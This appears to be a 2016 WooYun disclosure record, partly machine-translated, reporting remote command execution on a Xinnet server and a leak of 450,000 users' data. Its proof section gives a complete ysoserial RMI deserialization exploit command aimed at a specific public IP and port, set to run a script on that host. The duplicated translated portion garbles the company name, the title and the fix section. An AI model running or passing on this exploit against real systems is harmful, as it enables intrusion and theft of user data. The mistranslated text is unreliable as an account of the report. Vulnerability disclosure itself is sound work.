新网某站命令执行45万用户信息泄露

漏洞标题 新网某站命令执行45万用户信息泄露 相关厂商 北京新网互联科技有限公司 漏洞作者 小川 提交时间 2016-06-12 22:46 公开时间 2016-06-18 10:40 漏洞类型 系统…

漏洞标题 新的网站命令执行了450,000个用户信息泄漏 相关制造商 北京新旺互联网科技有限公司 漏洞作者 小川 提交时间 2016-06-12 22: 46 公共时间 2016-06-18 10: 40 漏洞类型 系统/服务补丁不及时 危险等级 高 自我评估等级 20 漏洞状态 该漏洞已通知供应商,但供应商忽略了该漏洞 标签标签 远程代码执行 漏洞详细信息

漏洞证明: Java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit 58.221.79.43 1099 CommonsCollections1'/tmp/my.sh'

修理计划: 我没有任何其他的ips,但它们都打开8090端口。对于一个系统,我会让它们离开。请把它们固定在一起。 版权声明:请注明出处。小川@乌云